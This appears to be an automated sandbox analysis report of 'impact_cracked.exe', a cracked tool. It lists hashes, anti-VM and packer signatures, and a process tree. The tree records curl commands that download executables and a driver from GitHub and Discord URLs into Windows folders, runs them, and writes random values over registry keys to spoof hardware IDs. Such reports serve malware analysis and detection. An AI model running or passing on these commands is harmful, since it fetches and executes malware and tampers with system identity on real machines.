Analysis

  • max time kernel
    74s
  • max time network
    80s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/12/2023, 00:14

General

  • Target

    impact_cracked.exe

  • Size

    6.1MB

  • MD5

    f8164877a685b3ff1aa8a4c7292e699c

  • SHA1

    279aba8c802d15f3507210b6bf702b678e30f5a3

  • SHA256

    20ffe6d5ffeefecc28bef795ba84e3bb8339522e103c32705b0360f24051b12c

  • SHA512

    f381a0789c50a89022acfc764766931ee43577637f6e11240ee6eade6a62f5e84a8c8b68fd2b240eddf184278693279e8a84a4863f2025f568e8acf0833d653c

  • SSDEEP

    98304:IB38757d1xzB92ETr/SG/e6ML0kySVPziZ42xBTBcSn7JNXjEFsZg5:Gs7D1xH3/SG/KL0fSNmZ9xhBj7zzes6

Malware Config

Signatures

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 1 IoCs
  • Themida packer 7 IoCs

    Detects Themida, an advanced Windows software protection system.

  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Drops file in Windows directory 6 IoCs
  • Modifies registry key 1 TTPs 10 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe
    "C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of WriteProcessMemory
    PID:4948
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:928
      • C:\Windows\system32\certutil.exe
        certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe" MD5
        3⤵
          PID:4752
        • C:\Windows\system32\find.exe
          find /i /v "md5"
          3⤵
            PID:3264
          • C:\Windows\system32\find.exe
            find /i /v "certutil"
            3⤵
              PID:4584
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/0vowp/s/main/1251766222259237725371applecleaner_2.exeaner_2.exe --output C:\Windows\IME\AppleCleaner.exe >nul 2>&1
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:4984
            • C:\Windows\system32\curl.exe
              curl https://raw.githubusercontent.com/0vowp/s/main/1251766222259237725371applecleaner_2.exeaner_2.exe --output C:\Windows\IME\AppleCleaner.exe
              3⤵
              • Drops file in Windows directory
              PID:640
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c start C:\Windows\IME\AppleCleaner.exe
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1244
            • C:\Windows\IME\AppleCleaner.exe
              C:\Windows\IME\AppleCleaner.exe
              3⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:3192
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c del C:\Windows\IME\AppleCleaner.exe
            2⤵
              PID:1116
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c cls
              2⤵
                PID:5060
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500820504596/Solution.exe --output C:\Windows\GameBarPresenceWriter\Solution.exe >nul
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1944
                • C:\Windows\system32\curl.exe
                  curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500820504596/Solution.exe --output C:\Windows\GameBarPresenceWriter\Solution.exe
                  3⤵
                  • Drops file in Windows directory
                  PID:1032
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754501239947345/Solution64.sys --output C:\Windows\GameBarPresenceWriter\Solution64.sys >nul
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:4500
                • C:\Windows\system32\curl.exe
                  curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754501239947345/Solution64.sys --output C:\Windows\GameBarPresenceWriter\Solution64.sys
                  3⤵
                  • Drops file in Windows directory
                  PID:1012
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754501659365396/Disk1.exe --output C:\Windows\GameBarPresenceWriter\Disk1.exe >nul
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1800
                • C:\Windows\system32\curl.exe
                  curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754501659365396/Disk1.exe --output C:\Windows\GameBarPresenceWriter\Disk1.exe
                  3⤵
                  • Drops file in Windows directory
                  PID:1020
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500023586896/Disk2.exe --output C:\Windows\GameBarPresenceWriter\Disk2.exe >nul
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:920
                • C:\Windows\system32\curl.exe
                  curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500023586896/Disk2.exe --output C:\Windows\GameBarPresenceWriter\Disk2.exe
                  3⤵
                  • Drops file in Windows directory
                  PID:2128
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500342362132/Mac.bat --output C:\Windows\GameBarPresenceWriter\Mac.bat >nul
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1444
                • C:\Windows\system32\curl.exe
                  curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500342362132/Mac.bat --output C:\Windows\GameBarPresenceWriter\Mac.bat
                  3⤵
                  • Drops file in Windows directory
                  PID:4812
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d %Random% /f >nul
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:2992
                • C:\Windows\system32\reg.exe
                  REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d 6131 /f
                  3⤵
                  • Modifies registry key
                  PID:3792
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d %Random% /f >nul
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:812
                • C:\Windows\system32\reg.exe
                  REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d 6131 /f
                  3⤵
                  • Modifies registry key
                  PID:672
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f >nul
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:4384
                • C:\Windows\system32\reg.exe
                  REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {613121375-3155415346-1546629722} /f
                  3⤵
                  • Modifies registry key
                  PID:1332
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1688
                • C:\Windows\system32\reg.exe
                  REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d 613432124-166506641-25780881 /f
                  3⤵
                  • Modifies registry key
                  PID:5096
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f >nul
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:2924
                • C:\Windows\system32\reg.exe
                  REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {613432124-166506641-25780881} /f
                  3⤵
                  • Modifies registry key
                  PID:4060
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f >nul
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:3640
                • C:\Windows\system32\reg.exe
                  REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {613432124-166506641-25780881} /f
                  3⤵
                  • Modifies registry key
                  PID:2856
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
                2⤵
                  PID:3488
                  • C:\Windows\system32\reg.exe
                    REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d 613432124-166506641-25780881 /f
                    3⤵
                    • Modifies registry key
                    PID:1836
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
                  2⤵
                    PID:4540
                    • C:\Windows\system32\reg.exe
                      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d 613432124-166506641-25780881 /f
                      3⤵
                      • Modifies registry key
                      PID:5084
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
                    2⤵
                      PID:1876
                      • C:\Windows\system32\reg.exe
                        REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d 613710104-174630705-33274807 /f
                        3⤵
                        • Modifies registry key
                        PID:3332
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f >nul
                      2⤵
                        PID:4216
                        • C:\Windows\system32\reg.exe
                          REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d 613710104-174630705-33274807 /f
                          3⤵
                          • Modifies registry key
                          PID:3120
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f >nul
                        2⤵
                          PID:2636

                      Network

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Windows\IME\AppleCleaner.exe

                              Filesize

                              2.9MB

                              MD5

                              4639664afed57a9e2ebb0373a715f159

                              SHA1

                              a7c166c3eac948aed501aac067214001df4e09b6

                              SHA256

                              af9e98021b05a245873ccf8bc952f89a2a856ad70323ab2d5a6687bdf811fbd3

                              SHA512

                              5b042a548cb1441b7e5fb2d526db386f0d842d998a8ff5685c9516db5402ad2d1dd7317be22e9c62349d46f961382cbc64db59564f54fe045f507791efea8ff9

                            • C:\Windows\IME\AppleCleaner.exe

                              Filesize

                              3.6MB

                              MD5

                              f96eb2236970fb3ea97101b923af4228

                              SHA1

                              e0eed80f1054acbf5389a7b8860a4503dd3e184a

                              SHA256

                              46fe5192387d3f897a134d29c069ebf39c72094c892134d2f0e77b12b11a6172

                              SHA512

                              2fd2d28c5f571d40b43a4dd7a22d367ba42420c29627f21ca0a2052070ffb9f689d80dad638238189eed26ed19af626f47e70f1207e10007041c620dac323cc7

                            • memory/3192-14-0x00007FF7DE790000-0x00007FF7DF132000-memory.dmp

                              Filesize

                              9.6MB

                            • memory/3192-10-0x00007FF7DE790000-0x00007FF7DF132000-memory.dmp

                              Filesize

                              9.6MB

                            • memory/3192-12-0x00007FFC05C10000-0x00007FFC05E05000-memory.dmp

                              Filesize

                              2.0MB

                            • memory/3192-13-0x00007FF7DE790000-0x00007FF7DF132000-memory.dmp

                              Filesize

                              9.6MB

                            • memory/3192-15-0x00007FF7DE790000-0x00007FF7DF132000-memory.dmp

                              Filesize

                              9.6MB

                            • memory/3192-16-0x00007FF7DE790000-0x00007FF7DF132000-memory.dmp

                              Filesize

                              9.6MB

                            • memory/3192-18-0x00007FFC05C10000-0x00007FFC05E05000-memory.dmp

                              Filesize

                              2.0MB

                            • memory/4948-6-0x00007FF7370D0000-0x00007FF737BD0000-memory.dmp

                              Filesize

                              11.0MB

                            • memory/4948-2-0x00007FF7370D0000-0x00007FF737BD0000-memory.dmp

                              Filesize

                              11.0MB

                            • memory/4948-1-0x00007FFC05E10000-0x00007FFC05E12000-memory.dmp

                              Filesize

                              8KB

                            • memory/4948-0-0x00007FF7370D0000-0x00007FF737BD0000-memory.dmp

                              Filesize

                              11.0MB